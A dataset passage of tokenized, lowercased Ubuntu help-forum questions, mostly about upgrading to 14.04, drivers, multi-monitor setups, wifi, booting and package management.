note that the image is from a dual-monitor setup with both on 1920x1024 , so it may take a while to render . on the right we have the original video and , on the left , the converted one . as you can see , the quality is horrible and the colors are all wrong . so , what else can i do ? i 've tried every single thing i could find on the internet and i simply can not convert this and maintain the quality . i 've even tried ffmpeg and mencoder with all the suggested parameters on the related post , but i also could n't get it converted with enough quality . thanks in advance !
449364	what does 'without password ' mean in sshd_config file ?	i just installed ubuntu 14.04 on my server and i was setting up all my config files when i came across this in my sshd_config file : # authentication : logingracetime 120 permitrootlogin without-password strictmodes yes this immedately made me very worried . i thought that it was possible that someone could be logging into my server right now as root without a password . i tried connecting to my server as root via : johns-mbp : ~ john $ ssh root @ 192.168.1.48 the authenticity of host '192.168.1.48 ( 192.168.1.48 ) ' ca n't be established . rsa key fingerprint is 40:7e:28 : f1 : a8:36:28 : da : eb:6f : d2 : d0:3f:4b:4b : fe . are you sure you want to continue connecting ( yes/no ) ? yes warning : permanently added '192.168.1.48 ' ( rsa ) to the list of known hosts . root @ 192.168.1.48 's password : permission denied , please try again . root @ 192.168.1.48 's password : i entered a blank password and it did n't let me in , which was a relief . so my question is : what does without password mean and why is this a default in ubuntu 14.04 ?
449365	kde top panel , always visible , not functioning,	just updated the system to kubuntu 14.04 , the top panel which is set to 'always visible ' is covering the windows , hiding the close , min , max buttons . it should have the top of the window fixed underneath it .
449366	how do i change the network to wireless instead of wired ?	how do i change my network from being a wired network to a wireless one ? its driveing me bonkers i have already tried typing in my wireless name and password and everything else that needed to be put in that i could think of but it still wont work it 's only working on the wired network which is a pain
449368	web server after upgrade	my web pages are no longer showing up , normally with localhost i would get my personal site i am working on up , but it is not , when i do localhost/phpmyadmin , it works , and i get phpmyadmin . just finished upgrading to 14.04 kubuntu ,
449374	could not determine the upgrade	do-release-upgrade ( trying to upgrade from 13.10 to 14.04 ) fails with this message : [ ... ] calculating the changes could not determine the upgrade an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . restoring original system state [ ... ] what can i do to fix it ? is it because of google-chrome ? if so , how do i fix that ? i ran sudo apt-get remove xserver-xorg-video-all , which seems to have fixed it .
449376	why do ubuntu & lubuntu 14.04 have different support periods ?	this does n't make sense . i rather have lxde as my desktop so i use lubuntu . but why is ubuntu 14.04 's lts support period 5 years when lubuntu 14.04 's is only 3 years ? do they not use the same repositories and therefore get all the same security updates ? this just does n't add up !
449377	4 monitor setup radeon open source 14.04 ( and others )	i am almost there but i have one or two minor issues . my setup is an amd based motherboard , ma785gm-us2h , which has the hd4200 integrated graphics , and an sapphire hd6770 video card . i have 2 displays hooked up to the mother board and 2 hooked up to the 6770 card . this setup works fine on windows 7 and even fine when ubuntu is run inside a vmplayer image on windows 7 i managed to get stuff to display on all 4 monitors , but the 2 displays on the 4200 are basically in clone mode ( but with different resolutions ) my latest attempt is using 14.04 ( just grabbed it today ) . i have played around with xrandr and have not been able to get the 2 displays into an `` extend '' mode . so what i really have is 3 monitors in an extended desktop and a 4th that is a clone of one of the . the only thing i really have customized is the .config/monitors.xml file which i am including below . i added the no stanza 's to the outputs of the monitors that are clones in an attempt to fix this but i had no affect . btw , i do n't think i can use the amd binary drivers , since the 4200 is too old for the latest drivers , and the 6770 is too new for the legacy drivers , and i do n't think the legacy drivers would work on anything new than 12.04.1 update : i see the following messages in /var/log/xorg.0.log [ 40.932 ] ( ii ) radeon ( g0 ) : set up textured video [ 40.932 ] ( ii ) radeon ( g0 ) : [ xvmc ] associated with radeon textured video . [ 40.932 ] ( ee ) radeon ( g0 ) : [ xvmc ] failed to initialize extension . [ 40.932 ] ( ii ) radeon ( g0 ) : randr 1.2 enabled , ignore the following randr disabled message . . . . [ 42.023 ] reporting 8 5 42 322 [ 42.149 ] ( ii ) radeon ( 0 ) : allocate new frame buffer 6080x1216 stride 6080 [ 42.149 ] ( ii ) radeon ( 0 ) : vram usage limit set to 909291k [ 42.151 ] have a master to look out for [ 42.151 ] adjust shatters 0 6080 [ 42.156 ] can not do multiple crtcs without x server dirty tracking 2 interface [ 42.156 ] failed to set shadow slave pixmap [ 42.156 ] need to create shared pixmap 0 ( ee ) radeon ( g0 ) : failed to set mode : no space left on devicereporting 8 5 42 322 [ 42.160 ] reporting 8 5 42 322 contents of .config/monitors.xml .config/monitors.xml < monitors version= '' 1 '' > < configuration > < clone > no < /clone > < output name= '' displayport-0 '' > < /output > < output name= '' hdmi-0 '' > < vendor > ibm < /vendor > < product > 0x4945 < /product > < serial > 0x01010101 < /serial > < width > 1600 < /width > < height > 1200 < /height > < rate > 60 < /rate > < x > 1600 < /x > < y > 1024 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > yes < /primary > < /output > < output name= '' dvi-0 '' > < vendor > del < /vendor > < product > 0xa002 < /product > < serial > 0x3034394c < /serial > < width > 1600 < /width > < height > 1200 < /height > < rate > 60 < /rate > < x > 0 < /x > < y > 1024 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < output name= '' vga-1-0 '' > < vendor > ibm < /vendor > < product > 0x1a50 < /product > < clone > no < /clone > < serial > 0x01010101 < /serial > < width > 1600 < /width > < height > 1200 < /height > < rate > 60 < /rate > < x > 3200 < /x > < y > 1024 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < output name= '' dvi-1-0 '' > < vendor > acr < /vendor > < product > 0xad18 < /product > < clone > no < /clone > < serial > 0x00000000 < /serial > < width > 1280 < /width > < height > 1024 < /height > < rate > 60 < /rate > < x > 0 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < /configuration > < /monitors >
449378	install something without make install	i have been struggling for few days trying to install a software . i 'm not actually working on ubuntu but i think the steps to do are the same . working on a gentoo ( the operating system of the robot nao ) distribution with no gcc and no make installed and no easy way to install them by myself . i want to install portaudio and the pyaudio library for python . all i have is a virtual machine emulating the robot where gcc and make are available . ./configure and make work well on the virtual machine . then i copy the folder with the generated binaries to the robot but ca n't run make install due to the missing make . i was able to manually install pyaudio by putting the .py in the right location but portaudio ( pyaudio depends on it ) is more tricky . now , whenever i try `` import pyaudio '' i have an error message asking for installing portaudio first . i tried to open the makefile and follow what the install section is doing with no success . i also searched for all files called portaudio after installing portaudio on the virtual machine and copied them one to one to the robot . still getting an error when importing pyaudio . does somebody know how to do an install manually ? thanks
449379	14.04 udisks2 not auto-mounting external drives	i 've upgraded from 13.10 to 14.04 via command-line when my system froze , had to do reisub and dpkg -- configure -a to recover from crash after rebooting . now everything seems to work except automatically mounting external thumb drives and external hard disk drives . after plugging in said drives , it 'll show up on the left pane but remains unmounted . had to click on it before it mounts . i believe my problem has something to do with udisks2 but i 'm not sure how to fix it . any help would be appreciated . thanks .
449381	problem with display status bar and unity	something wrong with the status bar it looks like stripe and the unity display also blurred and the border is not align , the system display wrong version of graphic driver , it say it is gallium 0.4 on ati rs600 when infact it is ati radeon xpress 1200 series , i tried different version and the problem is the same , please help
449384	touchpad menu in system setting missing also the touchpad are not working at all	my touchpad menu missing , and my touchpad are totally useless right now . it used to work well before , but when i start my computer at the next day , the touchpad does not work and touchpad menu had gone . how to fix this ? my touchpad are synaptic one..
449385	how can i upgrade to ubuntu 14.04 final from 14.04 beta correctly ?	i tried to upgrade to 14.04 final release from 14.04 beta . i executed following commands : sudo apt-get update sudo apt-get dist-upgrade my system updated packages after dist-upgrade . however after do-release-upgrade it gives the following output : vijay @ vijay-inspiron-5520 : ~ $ sudo do-release-upgrade checking for a new ubuntu release no new release found how to upgrade from beta correctly ?
449388	parallels ( tools ) 9 & 14.04	i can create 14.04 vm with parallels 9 ( on osx 10.9.2 ) just fine . however , once i install parallels tool , the launch and menu bars disappear . there 's still some functionality , e.g . i can create a folder and click on it to open the ubuntu equivalent of os x finder ( clearly i do n't know the former very well ) . but overall i 'm severely limited ( e.g . most application windows never appear ) . i 've looked through posts mentioning similar issues on earlier version of parallels/ubuntu/osx , but none of the tips mentioned has worked for me . any help here is much appreciated .
449389	wifi not working on ubuntu 14.04 macmini	i just installed 14.04 on a mac mini , and the wireless drivers are not working . i went into `` additional drivers '' and choose the broadcom proprietary drivers ( like i did in 12.04 ) but they 're not working correctly . the drivers work fine in 12.04 but not in 14.04 so i 'm not sure what the problem is . lspci -vvnn | grep 14e4 shows : 03:300.0 network controller [ 0280 ] : broadcom corporation bcm4321 802.11a/b/g/n [ 14e4:4328 ] ( rev 05 ) any ideas ? i 've activated the broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source with no luck . so i loaded in the b43 driver ( using modprobe b43 ) and now i can scan for wireless networks , but i ca n't connect to any of them . it sits trying to connect and then errors out . the other driver ( wl ) does n't seem to want to scan for wireless networks at all .
449391	unable to install ubuntu 14.04 . pc restarts after i click `` continue '' button in `` install ubuntu ''	i am unable to install ubuntu on my hardware because as soon as i enter the installation process and click the `` next '' button for installing it then it just reboots as if the flash drive has stopped working suddenly . this happens to me every time . i am booting from an usb flash drive in uefi mode because only that is working in my hardware . my pc already has linux mint 16 installed which i want to replace with ubuntu 14.04 but because of the reasons mentioned here , i am unable to do so . my hardware is a custom build pc having the following parts : cpu : amd a8 6600k | mobo : msi-fm2-a55m-e33 | ram : kingston hyperx blu 4gb ram | hdd : seagate barracuda 1tb drive any help would be highly appreciated as i really want to run 14.04 because of the improved drivers that would help in gaming . edit : posted the same on msi forums at https : //forum-en.msi.com/index.php ? topic=179619.0 in case if it is a hardware related bug .
449392	how to fix fuzzy spotify icon in the icon tray ?	i installed a spotify client today on my recent ubuntu 14.04 installation and i realized that the icon in the tray is very distorted : is there any way to fix this in ubuntu 14.04 ? any help would be greatly appreciated . serious props to asymptotically for this one ! his solution was amazing : now spotify actually looks like it belongs on my icon tray . awesome job .
449394	how to upgrade from ubuntu gnome 14.04 beta 2 to 14.04 lts final release ?	currently i have ubuntu gnome 14.04 beta2 release . but in details it shows as ubuntu 13.10 . please let me know how can i upgrade it 10 14.04 lts final release ( released 17th april ) . i tried in update-manager , but still it is not listing the new version .
449395	recover ubuntuone files after 14.04 installation	i need to restore my documents and folders , since the installation of 14.04 reformatted my harddisk . i can sign in to ubuntuone , but i see no way to make it restore the files to my harddisk .
449396	ubuntu server apply group policy to windows client	if i have an ubuntu server , could i apply window local policies with it ? all my clients are window 7 computers . i have a windows 2008 r2 server , but i want to see if i could use my ubuntu server . i would think that with local policy i could , seeing i could of use active directory & group policy on windows server , but the question is could i do this on a ubuntu server . maybe via remote commands ?
449399	why is duplicity set on hold automatically ?	when i start apt-get upgrade i get the message reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : duplicity i did n't set it on hold and /etc/apt/preferences and the folder /etc/apt/preferences.d are empty when i try apt-get dist-upgrade it would upgrade the packet . why is it set on hold ? and should i `` unhold '' it with sudo apt-mark unhold duplicity ? update : maybe it has something to do with a ppa i use ? $ cat /etc/apt/sources.list.d/*list|grep -v ' # ' deb http : //ppa.launchpad.net/charon-developers/charon-suite/ubuntu saucy main deb http : //download.jitsi.org/deb unstable/ deb [ arch=amd64 , i386 ] http : //repo.steampowered.com/steam/ precise steam deb-src [ arch=amd64 , i386 ] http : //repo.steampowered.com/steam/ precise steam deb http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu saucy main
449402	could someone give me the overview for adding to the kernel ?	i 've built my own kernels in gentoo before so i 'm no novice . i just did the dist-upgrade for xubuntu to 14.04 but alas the new kernel image wont support my wireless nic . thank goodness i still had the old kernel . i rebooted using the older kernel , and ran varun 's wireless script , and gathered the following info : # # # # wireless info start release distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty kernel linux satellite-c55-a 3.11.0-19-generic # 33-ubuntu smp tue mar 11 18:48:34 utc 2014 x86_64 x86_64 x86_64 gnu/linux lspci 01:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8162 fast ethernet [ 1969:1090 ] ( rev 10 ) subsystem : toshiba america info systems device [ 1179 : ff1e ] kernel driver in use : alx 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter [ 10ec:8179 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:0181 ] kernel driver in use : rtl8188ee can someone give me the proper commands to rebuild the new kernel to include the rtl8188ee driver old kernel : 3.11.0-19-generic - driver works new kernel : 3.13.0.24.28-generic - need to add driver
449404	correct steps to mount an internal backup harddrive	sorry if this is covered elsewhere , i 'm really hoping to get this right first time rather than lose backup information . i installed ubuntu 14.04 final beta a few days back - during the install , there was a problem installing the mbr to my target drive ( /dev/sdb - samsung 128gb ssd ) . the only way around it that i found was following a tutorial that had me boot into the live usb , install an application that did a guided repair of the mrb - it looks to have installed that on my backup drive ( /dev/sda - wd 350gb hd ) . i 've installed the 14.04 release today on /dev/sdb , but to boot it , i need to boot /dev/sda which has the mbr ( ie . /dev/sda needs to be first in the bios boot order ) . this `` works '' , but i do n't have access to the /dev/sda harddrive to access important backup data . what i 'm guessing i need to do is get the mbr on to /dev/sdb so that it boots independently , then find a way to mount and access /dev/sda - but i 'm not sure if the correct method , and i ca n't afford to lose what 's on /dev/sda . any help here would be deeply appreciated - i 'm reasonably comfortable with basic terminal commands ( update , install , remove , navigating directories etc . ) edit : here 's the output of cat /proc/partitions : mitch @ mitch : ~ $ cat /proc/partitions major minor # blocks name 8 0 312571224 sda 8 1 312570168 sda1 8 16 125034840 sdb 8 17 116689920 sdb1 8 18 1 sdb2 8 21 8342528 sdb5 11 0 1048575 sr0 edit : when using the 'sudo mount /dev/sda1 /mnt/wdhdd ' command , i get 'mount : you must specify the filesystem type ' . thanks heaps , mitchell edit 2 : output of 'parted -l ' : model : ata wdc wd3200bevt-7 ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 320gb 320gb primary boot model : ata samsung ssd 830 ( scsi ) disk /dev/sdb : 128gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 119gb 119gb primary ext4 2 119gb 128gb 8543mb extended 5 119gb 128gb 8543mb logical linux-swap ( v1 )
449407	how can i unlock ports to access server via url ?	some weeks ago i 've prepared a virtual server in virtualbox . it has the following specifications : os : ubuntu server 12.04 lts arch : 32 bits ram : 1 gb virtual hard disk size : 360 gb network adpaters : eth0 : nat eth1 : bridge adapter i also installed the following modules : apache2 , php5 and ssh well , the situation is the following one : i want to access the server via url ( http : //ip_address : port ) . when i enter without doing any change to ports.conf ( located in /etc/apache2 ) as http : //server_public_ip or http : //server_public_ip:80 , in the web browser appears the `` it works ! '' test page . but if i change the port in ports.conf ( i.e to 8000 , 8072 or 8080 ) , and after that change i reload the apache server , when i 'm going to enter to the server ( http : //server_public_ip:8000 , http : //server_public_ip:8072 or http : //server_public_ip:8080 , depending of the given port ) , it shows me the 404 error page . my question is : how can i unlock those ports ( or any other one ) to access to the server via url ? note i 've tried with iptables and ufw , but they did n't help to solve the problem .
449408	settings for display brightness not saved in ubuntu 14.04	i have bought hp envy 15t laptop and installed ubuntu 13.10 on it . the first annoying thing i faced with was restoring brightness settings to 100 % after reboot . so i had to adjust it every time i reboot . i googled and found variety of workarounds of this issue . recently i installed ubuntu 14.04 and the issue is still here . i really do n't understand is it so difficult to save brightness settings and restore them after reboot . as a user i do n't want to look for workarounds and edit configuring files or install additional utils for settings already implemented in system settings every time i install ubuntu . also checkbox `` dim screen to save power '' has no effect .
449411	upgrading to final 14.04 lts from beta version	i installed 14.04 on before 17th its final release that is beta version . how can upgrade it to ubuntu 14.04 lts which released on 17th aprl 2014 .
449412	lacking some software and fonts on a fresh installation on an arm-based chromebook	i just installed ubuntu on my arm-based samsung chromebook . it was really easy and i had no problems at all . but when i started it , first i had to manually install gnome-terminal , firefox , etc . and it still lacks the archive manger . and also the fonts are also not of the ubuntu family ( i really want to know how to install them ) . can i just download an iso image form the internet , make a bootable usb stick and install it or what ? and also if that 's not possible then can you tell me how to get the proper fonts and also the archive manager application and ubuntu software center . ( curious why were n't they installed ? )
449414	why is n't the dist-upgrade showing up in update-manager ?	ubuntu 14.04 was released on 17 april 2014 , and today it is already the 18th . why is n't the distribution showing up in my ubuntu update-manager ? ( i have set it so it will anounce every new version ) the content of /etc/update-manager/meta-release contains a link to : http : //changelogs.ubuntu.com/meta-release-lts is it correct , that it does n't show trusty yet ? so the only solution i see for me would be to set it manually with : source /etc/lsb-release sudo cp /etc/apt/sources.list /etc/apt/sources.list. $ distrib_codename sudo sed -i s/ $ distrib_codename/trusty/g /etc/apt/sources.list and then upgrade . do i have to disable the partner repos in this case ? # deb http : //archive.canonical.com/ubuntu trusty partner
449416	bootableusb stick created for installation , does n't working on ubuntu13.04	i also download a ubuntu-14.04-desktop-i386.iso file and also created a live usb stick by startup disk creator . it 's status said , live usb disk creation complete . then i did restart but nothing happen . it 's not booting . how i can install it . please help me . i 'm using ubuntu 13.04 . motherboard : gigabyte g-41mt-es2l
449419	13.04 gnome layout	my panel does n't look like the one of other folks , for example the help and other images i 've seen . i also do n't see things like system settings , rather i see system tools . so several suggestions for fixes do n't correspond to the way my computer looks like . ( i 'm trying to find my way in the situation while i 'm migrating from windows )
449422	why ca n't i write to my usb stick ?	i am trying to create a bootable usb stick with ubuntu 14.04 so i can install it on my computer , but for some reason , i get an authentication error : i tried using gnome partition editor to format the stick , and i deleted all partitions . i 've tried ext4 and fat32 partitions . currently it is fat32 : the permissions are not determinable , but i ca n't read or write any files to the usb stick : it 's just a regular 2gb usb stick : how do i get control over this usb stick so that i can write a bootable image to it ?
449425	problems with installing progrmas	i have tried installing both spideroak and google earth by downloading the .deb packages from their websites . they finish and ubuntu software center install them like normal and they show up in my drop down menus . but they do n't show up in the installed software list . in addition , when i click on them ( from the menu ) , nothing happens . please help !
449426	pinning package using own repository and apt-get	i created my own repository so i can provide a newer version of a package than the one the ubuntu repository currently holds . everything works fine , with the exception that i have to specify the version when installing it : sudo apt-get install package=1.2.1 if i do n't specify the version , then it will install it from ubuntu 's repository . i tried to put my repository at the top of the sources.list but it does n't make any difference . so i 'm wondering if there 's a flag when building the .deb package that will give priority to my repository at all times ? or a flag in the actual repository ? i 'd prefer not having the user to change their /etc/apt/preferences to set the priority , nor using apt-get -t repo . i tried to install the tor browser given this instructions and it does install the latest version from their custom repo . i do n't know what they 're doing but it does work with only the steps they list .
449428	unable to locate package boot-repair in 14.04	i 've tried to install boot repair and failed sudo add-apt-repository -y ppa : yannubuntu/boot-repair & & sudo apt-get update the error is : $ sudo apt-get install -y boot-repair reading package lists ... done building dependency tree reading state information ... done e : unable to locate package boot-repair i 've never had this error before on other versions of ubuntu or mint , though .
449430	how do i run wine through qemu ?	say im running an arm based platform but i want to run wine for a simple non-graphically intensive application . example : ms office . how does one achieve this ?
449432	will formatting my hard drive to install ubuntu also get rid of my recovery partition ?	i am looking to install ubuntu 14.04 on my computer and am thinking about wiping the drive but i am worried that if i wipe the drive it will also remove my recovery partition . the recovery partition came standard on my laptop so i do n't want it gone ( the computer did n't come with recovery disks ) . will the ubuntu installation remove my recovery partition and is this even a real concern ?
449433	is there a way so show mounted servers in the unity launcher	i connect to several servers , which when mounted show up under network in nautilus , however they do n't show up in the unity launcher . is there a way to make them show up there just like the normal local drives ? note they are mounted ssh/sftp if that helps ?
449438	could not calculate the upgrade , upgrade 12.04 to 14.04	i get the error could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . any solution ?
449442	how to connect mts broadband to internet in ubuntu 14.04 ?	modem is not detecting in network manager but it is detected while running lsusb command . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 003 : id 1bbb:0012 t & a mobile phones bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 064e : c21c suyin corp .
449445	how does one upgrade ubuntu ( any version to latest version ) using an iso image ?	if one have the slow internet connection or a limited data plan or sometime no connectivity ; then how one can upgrade ubuntu from any older version to latest version of ubuntu using only iso image of latest version ?
449447	how do you update to a new version if you 're years behind ?	i 'm a new user of ubuntu , and my computer is several years old . it has a very old version of ubuntu ( i 'm not sure which , but it 's from at least three years ago ) on it , and i want to upgrade to the newest version , but i 'm not sure how . help ?
449449	euro truck simulator 2 not installing in ubuntu 14.04	one of my friend send me euro truck simulator 2 , whenever i try to install it the following occurs : kapil @ kapil-dell-system-vostro-3750 : ~/l $ ./eurotrucksimulator2.sh verifying archive integrity ... all good . uncompressing installer for euro truck simulator 2 ... ... ... . uncompressing sub archivewarning : no binaries for `` x86_64 '' found , trying to default to x86 ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... collecting info for this system ... operating system : linux cpu arch : x86 nixstaller version 0.5.1 , copyright ( c ) 2006 - 2009 of rick helmus nixstaller comes with absolutely no warranty . nixstaller is free software , and you are welcome to redistribute it under certain conditions ; see the about section for details . error opening terminal : xterm . xterm is installed
449450	which gmail notification app will work with 14.04 ?	i tried using the gmail webapp and unity mail , but neither of them light up the notification indicator ( the envelope does not turn blue ) . unity mail does n't even show up in the messaging menu . what can be done to fix them , what are some alternatives ?
449452	spotify web player no volume	i get no sound using the spotify web player . volume works in you tube and other flash players . any help is appreciated !
449456	how to play games on nvidia card in ununtu 14.04	i want to play only games on nvidia graphics card and render my desktop with intel grphics card . how do i add application profiles to nvidia x server settings .
449457	ubuntu.com not using ssl for hash values , signatures	neither http : //www.ubuntu.com nor http : //releases.ubuntu.com use ssl/tls connections . so i have an os install file and a matching hash value , but i got both from a site that looks like ubuntu.com but provided no certificate . is there an https site with the hashes and signatures or a trusted public key floating around somewhere ? how can we verify the files+hashes have not been tampered with ? thanks .
449458	ubuntu gnome 14.04 shows 13.10	i 'm running ubuntu gnome 14.04 and when i open `` details '' it shows 13.10 . in `` software & updates '' it shows 14.04 and all the repos are `` trusty '' . i installed 14.04 when it just became a beta if that makes any difference . everything is up to date . is this just me or is this a bug ?
449460	upgrading to 14.04 - stuck at setting up acpid	upgrading from a ubuntu 13.10 which ca n't shutdown properly , downloading was fine , but stuck at setting up acpid . it said setting up acpid ... what should i do ?
449461	how to transition from alpha/beta to stable apt source repository ?	is there a preferred method of transitioning from development to stable apt repositories ? i 've used apt pinning in the past on debian with mixed success with the development repo 's priorities at 10-90 . is there a better and more stable solution for allowing automatic package upgrades to more stable versions ? or should i just baby sit the upgrade process manually until it 's all on stable by putting specific packages on hold or keep while others are upgraded ? my specific situation during the beta2 of ubuntu 14.04 trusty tahr i saw the qa `` i installed an alpha or beta , am i up to date with the final release if i keep upgrading ? `` and decided to do that , and it has worked great on a few machines . then on one i installed a daily build of the zfs on linux ( ubuntu-zfs ) package with the following additional lines in my /etc/apt/sources.list file # zfs on linux deb http : //ppa.launchpad.net/zfs-native/stable/ubuntu saucy main deb-src http : //ppa.launchpad.net/zfs-native/stable/ubuntu saucy main deb http : //ppa.launchpad.net/zfs-native/daily/ubuntu trusty main deb-src http : //ppa.launchpad.net/zfs-native/daily/ubuntu trusty main this was before there was a stable repo available for zfs on linux for trusty . now that there is , i would like to transition to using the following repositories instead deb http : //ppa.launchpad.net/zfs-native/stable/ubuntu trusty main deb-src http : //ppa.launchpad.net/zfs-native/stable/ubuntu trusty main however i 'm in the situation that the package versions in the trusty stable repository are older than some of those currently installed . due to the zfs on linux system requiring a re-compile of its dynamic kernel modules , every time there is a new kernel version i 'd like to go carefully .
449466	inconsistency in showing disk label	i 've got my new laptop ( thinkpad 440p ) with windows 7.1 pre-installed and wanted to have single-boot ubuntu 14.04 on it . i wanted to change the disk partition table to `` msdos '' ( legacy ) , so i change boot startup setting to just legacy and using bootable ubuntu usb disk then used `` parted '' to change the table . sudo parted /dev/sda/ mklabel msdos mktable msdos the first problem is that when i check it with gparted it shows this disk as unallocated with no partition table . also when i run : sudo fdisk -l /dev/sda sometimes i get this message : '' disk /dev/sda does n't contain a valid partition table '' but sometimes it does n't show the same error . any try to install ubuntu will end up having an infinte pause and error on not being able to format partition in scsi ( 0,0,0 ) . what do you suggest in this case to make it possible to install ubuntu ? thanks in advance .
449467	switching from 12.04lts to 14.04lts	i have 12.04lts installed on my laptop . i want to upgrade it to 14.04lts . i tried to find a method but did n't succeed . i read somewhere that i can directly upgrade from one lts to other but how ?
449470	how do i turn unity back on ?	my ubuntu 14.04 upgrade did n't work . when i rebooted after it was done i had to choose between something called cinnamon and something called gnome fall back . i do n't like either . i ca n't find unity to turn it back on . also , i ca n't find nautilus .
449471	compiling linuxtv fails when appliying patch	i have upgraded to kubuntu 14.04 from 13.10 today . i found that my third party webcam packages were deleted during upgrade . i was using linuxtv drivers , so i followed the instructions given in this page http : //git.linuxtv.org/cgit.cgi/media_build.git/about/ i executed following commands in terminal git clone git : //linuxtv.org/media_build.git cd media_build ./build the following is the output of executing ./build command checking if the needed tools for ubuntu 14.04 lts are available needed package dependencies are met . ************************************************************ * this script will download the latest tarball and build it* * assuming that your kernel is compatible with the latest * * drivers . if not , you 'll need to add some extra backports , * * ./backports/ < kernel > directory . * * it will also update this tree to be sure that all compat * * bits are there , to avoid compilation failures * ************************************************************ * all drivers and build system are under gplv2 license * * firmware files are under the license terms found at : * * http : //www.linuxtv.org/downloads/firmware/ * * please abort in the next 5 secs if you do n't agree with * * the license * ************************************************************ not aborted . it means that the licence was agreed . proceeding ... **************************** updating the building system **************************** from git : //linuxtv.org/media_build * branch master - > fetch_head already up-to-date . make : entering directory `/tmp/media_build/linux' wget http : //linuxtv.org/downloads/drivers/linux-media-latest.tar.bz2.md5 -o linux-media.tar.bz2.md5.tmp -- 2014-04-18 07:10:34 -- http : //linuxtv.org/downloads/drivers/linux-media-latest.tar.bz2.md5 resolving linuxtv.org ( linuxtv.org ) ... 130.149.80.248 connecting to linuxtv.org ( linuxtv.org ) |130.149.80.248|:80 ... connected . http request sent , awaiting response ... 200 ok length : 101 [ application/x-bzip2 ] saving to : ‘linux-media.tar.bz2.md5.tmp’ 100 % [ ==================================================== > ] 101 -- .-k/s in 0s 2014-04-18 07:10:34 ( 5.67 mb/s ) - ‘linux-media.tar.bz2.md5.tmp’ saved [ 101/101 ] make : leaving directory `/tmp/media_build/linux' make : entering directory `/tmp/media_build/linux' tar xfj linux-media.tar.bz2 rm -f .patches_applied .linked_dir .git_log.md5 make : leaving directory `/tmp/media_build/linux' ********************************************************** * downloading firmwares from linuxtv.org . * ********************************************************** dvb-fe-bcm3510-01.fw dvb-fe-or51132-qam.fw dvb-fe-or51132-vsb.fw dvb-fe-or51211.fw dvb-fe-xc5000-1.6.114.fw dvb-ttpci-01.fw-261a dvb-ttpci-01.fw-261b dvb-ttpci-01.fw-261c dvb-ttpci-01.fw-261d dvb-ttpci-01.fw-261f dvb-ttpci-01.fw-2622 dvb-usb-avertv-a800-02.fw dvb-usb-bluebird-01.fw dvb-usb-dib0700-1.20.fw dvb-usb-dibusb-5.0.0.11.fw dvb-usb-dibusb-6.0.0.8.fw dvb-usb-dtt200u-01.fw dvb-usb-terratec-h5-drxk.fw dvb-usb-terratec-h7-az6007.fw dvb-usb-terratec-h7-drxk.fw dvb-usb-umt-010-02.fw dvb-usb-vp702x-01.fw dvb-usb-vp7045-01.fw dvb-usb-wt220u-01.fw dvb-usb-wt220u-02.fw v4l-cx231xx-avcore-01.fw v4l-cx23418-apu.fw v4l-cx23418-cpu.fw v4l-cx23418-dig.fw v4l-cx23885-avcore-01.fw v4l-cx23885-enc.fw v4l-cx25840.fw ****************** * start building * ****************** make -c /tmp/media_build/v4l allyesconfig make [ 1 ] : entering directory `/tmp/media_build/v4l' make [ 2 ] : entering directory `/tmp/media_build/linux' applying patches for kernel 3.13.0-24-generic patch -s -f -n -p1 -i ../backports/api_version.patch patch -s -f -n -p1 -i ../backports/pr_fmt.patch the text leading up to this was : -- -- -- -- -- -- -- -- -- -- -- -- -- |diff -- git a/drivers/media/usb/gspca/dtcs033.c b/drivers/media/usb/gspca/dtcs033.c |index 5e42c71..ba01a3e 100644 | -- - a/drivers/media/usb/gspca/dtcs033.c |+++ b/drivers/media/usb/gspca/dtcs033.c -- -- -- -- -- -- -- -- -- -- -- -- -- no file to patch . skipping patch . 1 out of 1 hunk ignored make [ 2 ] : *** [ apply_patches ] error 1 make [ 2 ] : leaving directory `/tmp/media_build/linux' make [ 1 ] : *** [ allyesconfig ] error 2 make [ 1 ] : leaving directory `/tmp/media_build/v4l' make : *** [ allyesconfig ] error 2 ca n't select all drivers at ./build line 490 . i do n't really know how to proceed from this point . if someone have solution to this problem kindly let me know .
